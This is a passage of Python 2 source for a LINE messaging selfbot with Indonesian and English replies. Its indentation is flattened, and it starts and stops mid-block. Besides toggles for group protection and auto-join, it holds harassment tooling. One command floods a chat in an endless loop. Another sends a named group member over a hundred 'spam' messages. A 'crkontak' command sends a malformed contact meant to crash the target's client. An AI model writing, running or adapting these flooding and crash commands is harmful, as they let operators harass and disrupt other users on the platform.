if wait["protect"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection already Off")
else:
kr1.sendText(msg.to,"Protection already Off")
else:
wait["protect"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"ρяσтє¢тισи ѕєт тσ σff")
else:
kr1.sendText(msg.to,"ρяσтє¢тισи αℓяєα∂у σff")
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Qr already off")
else:
kr1.sendText(msg.to,"Protection Qr already off")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Qr already Off")
else:
kr1.sendText(msg.to,"Protection Qr already Off")
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Invite already Off")
else:
kr1.sendText(msg.to,"Protection Invite already Off")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Invite already Off")
else:
kr1.sendText(msg.to,"Protection Invite already Off")
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Cancel already Off")
else:
kr1.sendText(msg.to,"Protection Cancel already Off")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Cancel already Off")
else:
kr1.sendText(msg.to,"Protection Cancel already Off")
if wait["QrProtect"] == False:#<===
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protect QR Off")
else:
kr1.sendText(msg.to,"done")
else:
wait["QrProtect"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protect QR Off")
else:
kr1.sendText(msg.to,"done")
if wait["MProtection"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Member Protection Off")
else:
kr1.sendText(msg.to,"done")
else:
wait["MProtection"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Member Protection Off")
else:
kr1.sendText(msg.to,"done")
if msg.to in wait['pname']:
kr1.sendText(msg.to,"TURN OFF")
del wait['pname'][msg.to]
else:
kr1.sendText(msg.to,"ALREADY OFF")
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"proтecт cancel oғғ")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protect already oғғ")
if wait["autoKick"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Kick oғғ")
else:
wait["autoKick"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Kick already oғғ")
if wait["Protectguest"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Guest Stranger Off")
else:
kr1.sendText(msg.to,"done")
else:
wait["Protectguest"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Guest Stranger Off")
else:
kr1.sendText(msg.to,"done")
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protect Link Off")
else:
kr1.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protect Link Off")
else:
kr1.sendText(msg.to,"done")
#==========================[WIB]===========================
elif msg.text in ["contact on","Contact on"]:
#if msg.from_ in admin:
if wait['contact'] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
else:
kr1.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
else:
wait['contact'] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
else:
kr1.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
elif msg.text in ["contact off","Contact off"]:
#if msg.from_ in admin:
if wait['contact'] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ σƒƒ")
else:
kr1.sendText(msg.to,"ɕσηϯαɕϯ αʆɾεαδψ σƒƒ")
else:
wait['contact'] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ σƒƒ")
else:
kr1.sendText(msg.to,"ɕσηϯαɕϯ αʆɾεαδψ σƒƒ")
#==========================[WIB]===========================
elif msg.text in ["protect on","Protect on"]:
#if msg.from_ in admin:
if wait["protect"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protecion Already On")
else:
kr1.sendText(msg.to,"Protecion Already On")
else:
wait["protect"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protecion Already On")
else:
kr1.sendText(msg.to,"Protecion Already On")
#==========================[WIB]===========================
elif msg.text in ["tikel on","Tikel on"]:
#if msg.from_ in admin:
if wait['stiker'] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Stiker Already On")
else:
kr1.sendText(msg.to,"Stiker Already On")
else:
wait["stiker"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Stiker Already On")
else:
kr1.sendText(msg.to,"Stiker Already On")
#==========================[WIB]===========================
elif msg.text in ["qr on","Qr on"]:
#if msg.from_ in admin:
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Qr already On")
else:
kr1.sendText(msg.to,"Protection Qr already On")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Qr already On")
else:
kr1.sendText(msg.to,"Protection Qr already On")
#==========================[WIB]===========================
elif msg.text in ["invite on","Invite on"]:
#if msg.from_ in admin:
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Invite already On")
else:
kr1.sendText(msg.to,"Protection Invite already On")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"ρяσтє¢тισи ιиνιтє ѕєт тσ σи")
else:
kr1.sendText(msg.to,"ρяσтє¢тισи ιиνιтє αℓяєα∂у σи")
#==========================[WIB]===========================
elif msg.text in ["cancel on","Cancel on"]:
#if msg.from_ in admin:
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи")
else:
kr1.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи")
else:
kr1.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи")
#==========================[WIB]===========================
elif msg.text in ["autojoin on","Autojoin on"]:
#if msg.from_ in admin:
if wait['autoJoin'] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"αυтσʝσιи ѕєт тσ σи")
else:
kr1.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σи")
else:
wait['autoJoin'] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"αυтσʝσιи ѕєт тσ σи")
else:
kr1.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σи")
#==========================[WIB]===========================
elif msg.text in ["autojoin off","Autojoin off"]:
#if msg.from_ in admin:
if wait['autoJoin'] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"αυтσʝσιи ѕєт тσ σff")
else:
kr1.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σff")
else:
wait['autoJoin'] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"αυтσʝσιи ѕєт тσ σff")
else:
kr1.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σff")
#==========================[WIB]===========================
elif msg.text in ["protect off","Protect off"]:
#if msg.from_ in admin:
if wait["protect"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection already Off")
else:
kr1.sendText(msg.to,"Protection already Off")
else:
wait["protect"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"ρяσтє¢тισи ѕєт тσ σff")
else:
kr1.sendText(msg.to,"ρяσтє¢тισи αℓяєα∂у σff")
#==========================[WIB]===========================
elif msg.text in ["tikel off","Tikel off"]:
#if msg.from_ in admin:
if wait["stiker"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Stiker already Off")
else:
kr1.sendText(msg.to,"Stiker already Off")
else:
wait["stiker"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Stiker ѕєт тσ σff")
else:
kr1.sendText(msg.to,"Stiker αℓяєα∂у σff")
#==========================[WIB]===========================
elif msg.text in ["qr off","Qr off"]:
#if msg.from_ in admin:
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Qr already off")
else:
kr1.sendText(msg.to,"Protection Qr already off")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Qr already Off")
else:
kr1.sendText(msg.to,"Protection Qr already Off")
#==========================[WIB]===========================
elif msg.text in ["invit off","Invit off"]:
#if msg.from_ in admin:
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Invite already Off")
else:
kr1.sendText(msg.to,"Protection Invite already Off")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Invite already Off")
else:
kr1.sendText(msg.to,"Protection Invite already Off")
#==========================[WIB]===========================
elif msg.text in ["cancel off","Cancel off"]:
#if msg.from_ in admin:
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Cancel already Off")
else:
kr1.sendText(msg.to,"Protection Cancel already Off")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Cancel already Off")
else:
kr1.sendText(msg.to,"Protection Cancel already Off")
#==========================[WIB]===========================
elif "Grup cancel:" in msg.text:
#if msg.from_ in admin:
try:
strnum = msg.text.replace("Grup cancel:","")
if strnum == "off":
wait['autoCancel']["on"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Itu off undangan ditolak??\nSilakan kirim dengan menentukan jumlah orang ketika Anda menghidupkan")
else:
kr1.sendText(msg.to,"Off undangan ditolak??Sebutkan jumlah terbuka ketika Anda ingin mengirim")
else:
num = int(strnum)
wait['autoCancel']["on"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,strnum + "Kelompok berikut yang diundang akan ditolak secara otomatis")
else:
kr1.sendText(msg.to,strnum + "The team declined to create the following automatic invitation")
except:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Nilai tidak benar")
else:
kr1.sendText(msg.to,"Weird value")
#==========================[WIB]===========================
elif msg.text in ["autoleave on","Autoleave on"]:
#if msg.from_ in admin:
if wait['leaveRoom'] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Auto Leave room set to on")
else:
kr1.sendText(msg.to,"Auto Leave room already on")
else:
wait['leaveRoom'] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Auto Leave room set to on")
else:
kr1.sendText(msg.to,"Auto Leave room already on")
elif msg.text in ["autoleave off","Autoleave off"]:
#if msg.from_ in admin:
if wait['leaveRoom'] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Auto Leave room set to off")
else:
kr1.sendText(msg.to,"Auto Leave room already off")
else:
wait['leaveRoom'] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Auto Leave room set to off")
else:
kr1.sendText(msg.to,"Auto Leave room already off")
#==========================[WIB]===========================
elif msg.text in ["share on","share on"]:
#if msg.from_ in admin:
if wait['timeline'] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Share set to on")
else:
kr1.sendText(msg.to,"Share already on")
else:
wait['timeline'] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Share set to on")
else:
kr1.sendText(msg.to,"Share already on")
#==========================[WIB]===========================
elif msg.text in ["Oswib"]:
random.choice(KAC).sendImageWithURL(msg.to)
random.choice(KAC).sendText(msg.to,"↥↥↥↥↥↪ Pembuat Bots ↩↥↥↥↥↥")
elif msg.text in ["share off","Share off"]:
#if msg.from_ in admin:
if wait['timeline'] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Share set to off")
else:
kr1.sendText(msg.to,"Share already off")
else:
wait['timeline'] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Share set to off")
else:
kr1.sendText(msg.to,"Share already off")
#==========================[WIB]===========================
elif msg.text in ["status","Status"]:
#if msg.from_ in admin:
md = """╔═════════════\n"""
if wait['contact'] == True: md+="╠[➣Contact:on [✅]\n"
else: md+="╠[➣Contact:off [❌]\n"
if wait['autoJoin'] == True: md+="╠[➣Auto Join:on [✅]\n"
else: md +="╠[➣Auto Join:off [❌]\n"
if wait['autoCancel']["on"] == True:md+="╠[➣Auto cancel:" + str(wait['autoCancel']["members"]) + "[✅]\n"
else: md+= "╠[➣Group cancel:off [❌]\n"
if wait['leaveRoom'] == True: md+="╠[➣Auto leave:on [✅]\n"
else: md+="╠[➣Auto leave:off [❌]\n"
if wait['timeline'] == True: md+="╠[➣Share:on [✅]\n"
else:md+="╠[➣Share:off [❌]\n"
if wait['autoAdd'] == True: md+="╠[➣Auto add:on [✅]\n"
else:md+="╠[➣Auto add:off [❌]\n"
if wait["protect"] == True: md+="╠[➣Protect:on [✅]\n"
else:md+="╠[➣Protect:off [❌]\n"
if wait["linkprotect"] == True: md+="╠[➣Link Protect:on [✅]\n"
else:md+="╠[➣Link Protect:off [❌]\n"
if wait["inviteprotect"] == True: md+="╠[➣Invitation Protect:on [✅]\n"
else:md+="╠[➣Invitation Protect:off [❌]\n"
if wait["cancelprotect"] == True: md+="╠[➣Cancel Protect:on [✅]\n"
else:md+="╠[➣Cancel Protect:off [❌]\n╚═════════════"
kr1.sendText(msg.to,md)
msg.contentType = 13
msg.contentMetadata = {'mid': "u0710a42a75e0a476ad687639db8c069c"}
kr1.sendMessage(msg)
#==========================[WIB]===========================
elif cms(msg.text,["creator","Creator"]):
msg.contentType = 13
msg.contentMetadata = {'mid': "u0710a42a75e0a476ad687639db8c069c"}
kr1.sendMessage(msg)
kr1.sendText(msg.to,'❂➣ Creator yang manis kalem ')
#==========================[WIB]===========================
elif msg.text in ["autoadd on","Autoadd on"]:
#if msg.from_ in admin:
if wait['autoAdd'] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Auto add set to on")
else:
kr1.sendText(msg.to,"Auto add already on")
else:
wait['autoAdd'] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Auto add set to on")
else:
kr1.sendText(msg.to,"Auto add already on")
elif msg.text in ["autoadd off","autoadd off"]:
if msg.from_ in admin:
if wait['autoAdd'] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Auto add set to off")
else:
kr1.sendText(msg.to,"Auto add already off")
else:
wait['autoAdd'] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Auto add set to off")
else:
kr1.sendText(msg.to,"Auto add already off")
#==========================[WIB]===========================
elif "Pesan set:" in msg.text:
if msg.from_ in admin:
wait['message'] = msg.text.replace("Pesan set:","")
kr1.sendText(msg.to,"We changed the message")
#==========================[WIB]===========================
elif msg.text in ["pesan cek","Pesan cek"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait['message'])
else:
kr1.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait['message'])
#==========================[WIB]===========================
elif "Coment Set:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Coment Set:","")
if c in [""," ","\n",None]:
kr1.sendText(msg.to,"Merupakan string yang tidak bisa diubah")
else:
wait["comment"] = c
kr1.sendText(msg.to,"Ini telah diubah\n\n" + c)
#==========================[WIB]===========================
elif msg.text in ["Comment on","comment on"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Aku berada di")
else:
kr1.sendText(msg.to,"To open")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Comment Actived")
else:
kr1.sendText(msg.to,"Comment Has Been Active")
elif msg.text in ["Comment off","comment off"]:
if msg.from_ in admin:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Hal ini sudah off")
else:
kr1.sendText(msg.to,"It is already turned off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Off")
else:
kr1.sendText(msg.to,"To turn off")
#==========================[WIB]===========================
elif msg.text in ["Com","Comment"]:
if msg.from_ in admin:
kr1.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:??\n\n" + str(wait["comment"]))
elif msg.text in ["Com Bl"]:
if msg.from_ in admin:
wait["wblack"] = True
kr1.sendText(msg.to,"Please send contacts from the person you want to add to the blacklist")
elif msg.text in ["Com hapus Bl"]:
#if msg.from_ in admin:
wait["dblack"] = True
kr1.sendText(msg.to,"Please send contacts from the person you want to add from the blacklist")
elif msg.text in ["Com Bl cek"]:
#if msg.from_ in admin:
if wait["commentBlack"] == {}:
kr1.sendText(msg.to,"Nothing in the blacklist")
else:
kr1.sendText(msg.to,"The following is a blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +kr1.getContact(mi_d).displayName + "\n"
kr1.sendText(msg.to,mc)
#==========================[WIB]===========================
elif msg.text in ["jam on","Jam on"]:
#if msg.from_ in admin:
if wait["clock"] == True:
kr1.sendText(msg.to,"Jam already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"?%H:%M?")
profile = kr1.getProfile()
profile.displayName = wait["cName"] + nowT
kr1.updateProfile(profile)
kr1.sendText(msg.to,"Jam set on")
elif msg.text in ["jam off","Jam off"]:
#if msg.from_ in admin:
if wait["clock"] == False:
kr1.sendText(msg.to,"Jam already off")
else:
wait["clock"] = False
kr1.sendText(msg.to,"Jam set off")
elif "Jam say:" in msg.text:
if msg.from_ in admin:
n = msg.text.replace("Jam say:","")
if len(n.decode("utf-8")) > 30:
kr1.sendText(msg.to,"terlalu lama")
else:
wait["cName"] = n
kr1.sendText(msg.to,"Nama Jam Berubah menjadi:" + n)
elif msg.text in ["update","Update"]:
if msg.from_ in admin:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"?%H:%M?")
profile = kr1.getProfile()
profile.displayName = wait["cName"] + nowT
kr1.updateProfile(profile)
kr1.sendText(msg.to,"Diperbarui")
else:
kr1.sendText(msg.to,"Silahkan Aktifkan Jam")
#==========================[WIB]===========================
elif "Image " in msg.text:
#if msg.from_ in admin:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
kr1.sendImageWithURL(msg.to,path)
except:
pass
#==========================[WIB]===========================
elif "Spam change:" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
wait['spam'] = msg.text.replace("Spam change:","")
kr1.sendText(msg.to,"spam changed")
#==========================[WIB]===========================
elif "Spam add:" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
wait['spam'] = msg.text.replace("Spam add:","")
if wait["lang"] == "JP":
kr1.sendText(msg.to,"spam changed")
else:
kr1.sendText(msg.to,"Done")
#==========================[WIB]===========================
elif "Spam:" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
strnum = msg.text.replace("Spam:","")
num = int(strnum)
for var in range(0,num):
kr1.sendText(msg.to, wait['spam'])
#==========================[WIB]===========================
elif ".spam " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
bctxt = msg.text.replace(".spam ", "")
t = kr1.getAllContactIds()
t = 500
while(t):
kr1.sendText(msg.to, (bctxt))
#==========================[WIB]===========================
elif "Spamcontact @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Spamcontact @","")
_nametarget = _name.rstrip(' ')
gs = kr1.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(msg.to, "Selesai di Spam")
print " Spammed !"
#==========================[WIB]===========================
elif "crkontak @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("crkontak @","")
_nametarget = _name.rstrip(' ')
msg.contentType = 13
msg.contentMetadata = {'mid': "u1f41296217e740650e0448b96851a3e2',"}
msg.text = None
gs = kr1.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
try:
kr1.sendMessage(g.mid,msg)
kr1.sendText(msg.to, "crash kontak selesai")
print " Spammed crash !"
except:
pass
#==========================[WIB]===========================
elif msg.text in ["Invite"]:
if msg.from_ in admin:
wait["invite"] = True
kr1.sendText(msg.to,"Kirim Contact")
#==========================[WIB]===========================
elif msg.text in ["Jepit"]:
if msg.from_ in admin:
wait["invite2"] = True
random.choice(KAC).sendText(msg.to,"Kirim Contact")
#==========================[WIB]===========================
elif msg.text in ["Undang"]:
if msg.from_ in admin:
wait["winvite"] = True
kr2.sendText(msg.to,"Kirim Contact")
#==========================[WIB]===========================
elif msg.text in ["Steal contact"]:
if msg.from_ in admin:
wait['contact'] = True
kr1.sendText(msg.to,"Send Contact")
#==========================[WIB]===========================
elif msg.text in ["Like:me","Like me"]: #Semua Bot Ngelike Status Akun Utama
if msg.from_ in admin:
print "[Command]Like executed"
kr1.sendText(msg.to,"Like Status Owner")
try:
likeme()
except:
pass
#==========================[WIB]===========================
elif msg.text in ["Like:friend","Like friend"]: #Semua Bot Ngelike Status Teman
if msg.from_ in admin:
print "[Command]Like executed"
kr1.sendText(msg.to,"Like Status Teman")
try:
likefriend()
except:
pass
#==========================[WIB]===========================
elif msg.text in ["Like:on","Like on"]:
if msg.from_ in admin:
if wait['likeOn'] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Done")
else:
wait['likeOn'] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Already")
#==========================[WIB]===========================
elif msg.text in ["Like off","Like:off"]:
if msg.from_ in admin:
if wait['likeOn'] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Done")
else:
wait['likeOn'] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Already")
#==========================[WIB]===========================
elif msg.text in ["Simisimi on","Simisimi:on"]:
#if msg.from_ in admin:
settings["simiSimi"][msg.to] = True
kr1.sendText(msg.to,"Simi mode On")
#==========================[WIB]===========================
elif msg.text in ["Simisimi off","Simisimi:off"]:
#if msg.from_ in admin:
settings["simiSimi"][msg.to] = False
kr1.sendText(msg.to,"Simi mode Off")
#==========================[WIB]===========================
elif msg.text in ["Tag on","tag on"]:
#if msg.from_ in admin:
wait['detectMention'] = True
kr1.sendText(msg.to,"Auto respon tag On")
#==========================[WIB]===========================
elif msg.text in ["Tag off","tag off"]:
if msg.from_ in admin:
wait['detectMention'] = False
kr1.sendText(msg.to,"Auto respon tag Off")
#==========================[WIB]===========================
elif msg.text in ["Respoto on","respoto on"]:
if msg.from_ in admin:
wait['potoMention'] = True
kr1.sendText(msg.to,"Auto respon tag poto On")
#==========================[WIB]===========================
elif msg.text in ["Respoto off","respoto off"]:
if msg.from_ in admin:
wait['potoMention'] = False
kr1.sendText(msg.to,"Auto respon tag poto Off")
#==========================[WIB]===========================
elif msg.text in ["Tag2 on","tag2 on"]:
if msg.from_ in admin:
wait['kickMention'] = True
kr1.sendText(msg.to,"Auto Kick tag ON")
#==========================[WIB]===========================
elif msg.text in ["Tag2 off","tag2 off"]:
if msg.from_ in admin:
wait['kickMention'] = False
kr1.sendText(msg.to,"Auto Kick tag OFF")
#==========================[WIB]===========================
elif "Time" in msg.text:
if msg.toType == 2:
kr1.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
#==========================[WIB]===========================
elif msg.text in ["Sambut on","sambut on"]:
if msg.from_ in admin:
if wait["Wc"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"noтιғ yg joιn on")
else:
wait["Wc"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"already on")
elif msg.text in ["Sambut off","sambut off"]:
if msg.from_ in admin:
if wait["Wc"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"noтιғ yg joιn oғғ")
else:
wait["Wc"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"already oғғ")
#==========================[WIB]===========================
elif msg.text in ["Sambut2 on","sambut2 on"]:
if msg.from_ in admin:
if wait["Wc2"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"noтιғ yg joιn poto on")
else:
wait["Wc2"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"already on")
elif msg.text in ["Sambut2 off","sambut2 off"]:
if msg.from_ in admin:
if wait["Wc2"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"noтιғ yg joιn poto oғғ")
else:
wait["Wc2"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"already oғғ")
#==========================[WIB]===========================
elif msg.text in ["Pergi on","pergi on"]:
if msg.from_ in admin:
if wait["Lv"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"noтιғ yg leave on")
else:
wait["Lv"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"already on")
elif msg.text in ["Pergi off","pergi off"]:
if msg.from_ in admin:
if wait["Lv"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"noтιғ yg leave oғғ")
else:
wait["Lv"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"already oғғ")
#==========================[WIB]===========================
elif "Bye bye" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Dadas","")
gs = kr1.getGroup(msg.to)
gs = kr2.getGroup(msg.to)
gs = kr3.getGroup(msg.to)
kr1.sendText(msg.to,"Jangan panik, santai aja ya ô")
